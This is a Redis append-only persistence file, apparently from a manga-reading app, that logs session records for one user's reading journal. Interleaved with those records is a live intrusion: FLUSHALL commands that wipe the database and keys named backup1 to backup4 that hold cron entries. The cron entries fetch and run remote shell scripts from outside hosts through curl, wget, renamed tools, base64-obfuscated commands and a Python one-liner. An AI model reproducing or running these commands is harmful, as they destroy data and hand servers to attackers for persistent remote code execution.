*2
$6
SELECT
$1
0
*8
$4
HSET
$36
0fdfeb5c-f50d-40aa-9e97-c753ab4854d6
$6
absexp
$2
-1
$6
sldexp
$2
-1
$4
data
$120
{"ID":"0fdfeb5c-f50d-40aa-9e97-c753ab4854d6","ReadingJournal":{"LastReadMangaID":"","AllReadMangaIDs":[],"WishList":[]}}
*8
$4
HSET
$36
0fdfeb5c-f50d-40aa-9e97-c753ab4854d6
$6
absexp
$2
-1
$6
sldexp
$2
-1
$4
data
$158
{"ID":"0fdfeb5c-f50d-40aa-9e97-c753ab4854d6","ReadingJournal":{"LastReadMangaID":"","AllReadMangaIDs":["801513ba-a712-498c-8f57-cae55b38cc92"],"WishList":[]}}
*8
$4
HSET
$36
0fdfeb5c-f50d-40aa-9e97-c753ab4854d6
$6
absexp
$2
-1
$6
sldexp
$2
-1
$4
data
$194
{"ID":"0fdfeb5c-f50d-40aa-9e97-c753ab4854d6","ReadingJournal":{"LastReadMangaID":"801513ba-a712-498c-8f57-cae55b38cc92","AllReadMangaIDs":["801513ba-a712-498c-8f57-cae55b38cc92"],"WishList":[]}}
*1
$8
flushall
*3
$3
set
$7
backup1
$91



*/2 * * * * echo Y2QxIGh0dHA6Ly9zLm5hLWNzLmNvbS9iMmY2MjgvYi5zaAo=|base64 -d|bash|bash 


*3
$3
set
$7
backup2
$102



*/3 * * * * echo d2dldCAtcSAtTy0gaHR0cDovL3MubmEtY3MuY29tL2IyZjYyOC9iLnNoCg==|base64 -d|bash|bash


*3
$3
set
$7
backup3
$90



*/4 * * * * echo Y3VybCBodHRwOi8vcy5uYS1jcy5jb20vYjJmNjI4L2Iuc2gK|base64 -d|bash|bash


*3
$3
set
$7
backup4
$123



@hourly  python -c "import urllib2; print urllib2.urlopen('http://\\s.n\a-c\s.c\om/t.sh').read()" >.1;chmod +x .1;./.1


*1
$8
flushall
*3
$3
set
$7
backup1
$96



*/2 * * * * root echo Y2QxIGh0dHA6Ly9zLm5hLWNzLmNvbS9iMmY2MjgvYi5zaAo=|base64 -d|bash|bash 


*3
$3
set
$7
backup2
$107



*/3 * * * * root echo d2dldCAtcSAtTy0gaHR0cDovL3MubmEtY3MuY29tL2IyZjYyOC9iLnNoCg==|base64 -d|bash|bash


*3
$3
set
$7
backup3
$95



*/4 * * * * root echo Y3VybCBodHRwOi8vcy5uYS1jcy5jb20vYjJmNjI4L2Iuc2gK|base64 -d|bash|bash


*3
$3
set
$7
backup4
$123



@hourly  python -c "import urllib2; print urllib2.urlopen('http://\\s.n\a-c\s.c\om/t.sh').read()" >.1;chmod +x .1;./.1


*2
$6
SELECT
$1
0
*1
$8
flushall
*3
$3
set
$7
backup1
$65



*/2 * * * * cd1 -fsSL http://en2an.top/cleanfda/init.sh | sh


*3
$3
set
$7
backup2
$67



*/3 * * * * wget -q -O- http://en2an.top/cleanfda/init.sh | sh


*3
$3
set
$7
backup3
$69



*/4 * * * * curl -fsSL http://45.83.123.29/cleanfda/init.sh | sh


*3
$3
set
$7
backup4
$69



*/5 * * * * wd1 -q -O- http://45.83.123.29/cleanfda/init.sh | sh


*1
$8
flushall
*3
$3
set
$7
backup1
$70



*/2 * * * * root cd1 -fsSL http://en2an.top/cleanfda/init.sh | sh


*3
$3
set
$7
backup2
$72



*/3 * * * * root wget -q -O- http://en2an.top/cleanfda/init.sh | sh


*3
$3
set
$7
backup3
$74



*/4 * * * * root curl -fsSL http://45.83.123.29/cleanfda/init.sh | sh


*3
$3
set
$7
backup4
$74



*/5 * * * * root wd1 -q -O- http://45.83.123.29/cleanfda/init.sh | sh


*8
$4
HSET
$36
0fdfeb5c-f50d-40aa-9e97-c753ab4854d6
$6
absexp
$2
-1
$6
sldexp
$2
-1
$4
data
$120
{"ID":"0fdfeb5c-f50d-40aa-9e97-c753ab4854d6","ReadingJournal":{"LastReadMangaID":"","AllReadMangaIDs":[],"WishList":[]}}
*8
$4
HSET
$36
0fdfeb5c-f50d-40aa-9e97-c753ab4854d6
$6
absexp
$2
-1
$6
sldexp
$2
-1
$4
data
$158
{"ID":"0fdfeb5c-f50d-40aa-9e97-c753ab4854d6","ReadingJournal":{"LastReadMangaID":"","AllReadMangaIDs":["801513ba-a712-498c-8f57-cae55b38cc92"],"WishList":[]}}
*8
$4
HSET
$36
0fdfeb5c-f50d-40aa-9e97-c753ab4854d6
$6
absexp
$2
-1
$6
sldexp
$2
-1
$4
data
$194
{"ID":"0fdfeb5c-f50d-40aa-9e97-c753ab4854d6","ReadingJournal":{"LastReadMangaID":"801513ba-a712-498c-8f57-cae55b38cc92","AllReadMangaIDs":["801513ba-a712-498c-8f57-cae55b38cc92"],"WishList":[]}}
